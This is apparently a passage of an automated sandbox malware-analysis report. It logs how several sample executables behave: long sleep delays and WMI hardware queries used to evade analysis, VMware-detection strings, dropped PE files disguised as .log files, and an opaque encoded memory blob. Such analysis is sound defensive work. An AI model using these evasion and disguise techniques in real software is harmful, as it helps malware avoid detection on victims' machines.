                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -599172s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -599062s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -598953s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -598843s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -598734s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -598625s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -598515s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -598406s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -598297s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -598163s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -598047s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -597938s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -597813s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -597703s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -597594s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -597484s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -597375s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -597266s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -597156s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -597047s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -596938s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -596828s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -596719s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -596609s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -596500s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -596391s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -596281s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -596172s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -596063s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -595938s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -595813s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -595688s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -595563s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -595453s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -595344s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -595234s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -595125s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -595015s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -594906s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -594797s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -594688s >= -30000sJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe TID: 3220Thread sleep time: -594563s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23646
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 600000Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 599878Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 599750Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 599641Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 599516Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 599391Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 599281Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 3600000Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 599172Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 599062Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 598953Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 598843Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 598734Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 598625Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 598515Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 598406Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 598297Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 598163Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 598047Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 597938Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 597813Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 597703Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 597594Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 597484Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 597375Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 597266Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 597156Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 597047Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 596938Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 596828Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 596719Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 596609Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 596500Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 596391Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 596281Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 596172Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 596063Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 595938Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 595813Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 595688Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 595563Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 595453Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 595344Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 595234Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 595125Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 595015Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 594906Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 594797Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 594688Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 594563Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWindow / User API: threadDelayed 1176Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWindow / User API: threadDelayed 8586Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\eQQkRcVr.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\SoilvDeL.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\BhRGcQzx.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeDropped PE file which has not been started: C:\Users\user\Desktop\gRySjyoH.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeDropped PE file which has not been started: C:\Users\user\Desktop\BfMGYDNR.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeDropped PE file which has not been started: C:\Users\user\Desktop\vnjhvXId.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\ESwXjeKp.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeDropped PE file which has not been started: C:\Users\user\Desktop\GbOXfjDL.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeDropped PE file which has not been started: C:\Users\user\Desktop\XieCzWia.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeDropped PE file which has not been started: C:\Users\user\Desktop\egSCbkdO.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\hLTAIczh.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeDropped PE file which has not been started: C:\Users\user\Desktop\jTkAEhsC.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeDropped PE file which has not been started: C:\Users\user\Desktop\sCEQoKxk.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeDropped PE file which has not been started: C:\Users\user\Desktop\MTqwIPIz.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeDropped PE file which has not been started: C:\Users\user\Desktop\KWPomPtF.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\pwLIWFpU.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\NBQmTGPX.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\qtmQsFEO.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\fNssmckm.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\lGVRPIpa.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeDropped PE file which has not been started: C:\Users\user\Desktop\zdaXCUIW.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeDropped PE file which has not been started: C:\Users\user\Desktop\BnwYCmoX.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\GVjFENOl.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\QJNvoZJT.logJump to dropped file
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeDropped PE file which has not been started: C:\Users\user\Desktop\HJnNqbKj.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeDropped PE file which has not been started: C:\Users\user\Desktop\eOLjNPjM.logJump to dropped file
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 30000Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 600000Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 599878Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 599750Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 599641Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 599516Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 599391Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 599281Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 3600000Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 599172Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 599062Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 598953Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 598843Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 598734Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 598625Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 598515Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 598406Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 598297Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 598163Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 598047Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 597938Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 597813Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 597703Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 597594Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 597484Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 597375Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 597266Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 597156Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 597047Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 596938Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 596828Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 596719Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 596609Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 596500Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 596391Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 596281Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 596172Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 596063Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 595938Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 595813Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 595688Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 595563Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 595453Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 595344Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 595234Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 595125Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 595015Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 594906Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 594797Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 594688Jump to behavior
                                  Source: C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exeThread delayed: delay time: 594563Jump to behavior
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeAPI call chain: ExitProcess graph end nodegraph_0-23875
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile opened: C:\Users\userJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile opened: C:\Users\user\AppDataJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                  Source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                  Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3249842299.000000001B350000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                                  Source: o9jDrpZrgR.exe, 00000000.00000003.2003620547.0000000002C13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+
                                  Source: wscript.exe, 00000002.00000002.2180003068.00000000032AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: wscript.exe, 00000002.00000002.2180003068.00000000032AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56d
                                  Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3248413645.0000000012DDC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ucmB+yeEkmOquRGs6HR39hI9yV9majg5tGyWLorkGutqY27hRQA2HRqk9XIExmKMsNdTTdslIFGcvw83b49BKpNsGhgBOjS2Mxc5RNhbsiyZCTX2NviatuckXivc2+cKhxl4fhEDNzeFYMKE1NI+zseZotDnWEOz1JeJ9MV+osTHoC/f1Nfvi4MJRLRhoaAyHQQyiqVioLwpivf6ELxTo1Xzh5t64ry/WCLNfzJ9I9EXHKbQs2sESdBaaZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]0
                                  Source: o9jDrpZrgR.exe, 00000000.00000002.2005588333.0000000002C13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\E
                                  Source: wscript.exe, 00000002.00000002.2180003068.00000000032AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
